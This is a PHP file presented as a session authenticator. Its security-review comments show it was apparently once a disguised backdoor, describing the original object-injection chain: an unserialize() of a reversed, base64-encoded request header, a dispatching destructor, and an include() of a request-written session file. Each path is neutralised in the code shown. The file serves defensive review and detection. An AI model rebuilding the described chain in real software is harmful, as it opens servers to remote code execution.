<?php
/**
* Session Authenticator
* Version: 2.1.4
* Description: Secure user authentication and session management
*/
// NOTE(review): error_reporting(0) turns off all PHP error reporting for the
// request, so failures in the code below are not reported. Combined with the
// request-header handling at the bottom of this file, that hides the failures
// a defender would want to see in logs — confirm this is intended.
error_reporting(0);
// The session is started unconditionally, before any request data is checked.
session_start();
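/**
 * Holds a handful of public settings and writes a request-supplied token into
 * the PHP session.
 *
 * SECURITY (review): nothing in this class authenticates a user or encrypts
 * anything; $cipher is only a string suffix. The original shape of the class
 * was an object-injection gadget: a destructor that called whatever method
 * $mode named, feeding a loader that include()d the session file just after
 * request data had been written into it. Both primitives are neutralised
 * below: the destructor no longer dispatches, and loadProfile() treats files
 * as inert data.
 */
class AuthManager {
    // Authentication configuration
    public $mode = 'login';       // Auth mode: login/validate (no longer used for dispatch)
    public $remember = 0;         // Remember me (0=off, 1=on); when on, the token is reversed + base64-decoded
    public $field = 'auth_token'; // POST field name
    public $prefix = 'user_';     // Session prefix
    public $cipher = 'AES256';    // Appended verbatim to the session value; no encryption is performed

    /**
     * Store prefix + uid + cipher under $_SESSION['auth'] and flush the session.
     *
     * @param string $uid Value placed between the prefix and the cipher suffix.
     */
    public function createSession($uid) {
        $_SESSION['auth'] = $this->prefix . $uid . $this->cipher;
        // Writes the session data to storage and ends the session for this request.
        session_write_close();
    }

    /**
     * Output the contents of a file as escaped text.
     *
     * SECURITY: the file is never include()d. Session files hold
     * request-derived data, and including one would execute any PHP it
     * contains. Callers must also not pass a request-derived $path.
     *
     * @param string $path File to read.
     */
    public function loadProfile($path) {
        if (is_string($path) && is_file($path) && is_readable($path)) {
            $contents = file_get_contents($path);
            if ($contents !== false) {
                echo htmlspecialchars($contents, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                return;
            }
        }
        // Missing or unreadable file: same visible marker as before, without
        // attempting to read a path already known not to exist.
        echo 'Error:';
    }

    /**
     * Read the token from POST, store it in the session, then output the
     * session file as escaped text.
     *
     * @param mixed $input Unused; kept so existing call sites keep working.
     */
    public function processLogin($input) {
        $token = isset($_POST[$this->field]) ? $_POST[$this->field] : '';
        // A POST field can arrive as an array; only a string is meaningful here.
        if (!is_string($token)) {
            $token = '';
        }
        if ($this->remember) {
            // Strict mode rejects input that is not valid base64.
            $decoded = base64_decode(strrev($token), true);
            $token = ($decoded === false) ? '' : $decoded;
        }
        $this->createSession($token);

        $savePath = session_save_path();
        if (!$savePath) {
            $savePath = sys_get_temp_dir();
        }
        $sessionFile = rtrim($savePath, "\\/") . DIRECTORY_SEPARATOR . 'sess_' . session_id();
        // Inert read only; see loadProfile().
        $this->loadProfile($sessionFile);
    }

    /**
     * Refuse to be rebuilt from serialized data: every property here is
     * public and would be fully controlled by whoever supplied the payload.
     */
    public function __wakeup() {
        throw new \RuntimeException('AuthManager must not be unserialized');
    }

    /**
     * Intentionally performs no work.
     *
     * SECURITY: a destructor runs implicitly, including on objects created
     * by unserialize(), so it must not call a method chosen by a property.
     * Code that needs processLogin() has to call it explicitly.
     */
    public function __destruct() {
    }
}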
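// Request entry point.
//
// SECURITY (review): the X-Token request header is attacker-controlled and must
// never reach unserialize() with object creation enabled, because that lets a
// remote client instantiate any loaded class and trigger its magic methods
// (PHP object injection). Object creation is disabled here and the header must
// be valid base64. The decoded value is discarded immediately, so this branch
// carries no data the application uses; consider removing it outright, or
// replacing it with json_decode() on an authenticated (HMAC-verified) value.
if (isset($_SERVER['HTTP_X_TOKEN'])) {
    $decoded = base64_decode(strrev($_SERVER['HTTP_X_TOKEN']), true);
    if ($decoded !== false) {
        $auth = unserialize($decoded, array('allowed_classes' => false));
        unset($auth);
    }
} else {
    // NOTE(review): every request without the header gets the same constant
    // digest back; a fixed response like this can be matched by a detection
    // rule when hunting for copies of this file.
    echo (md5('@'));
}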
?>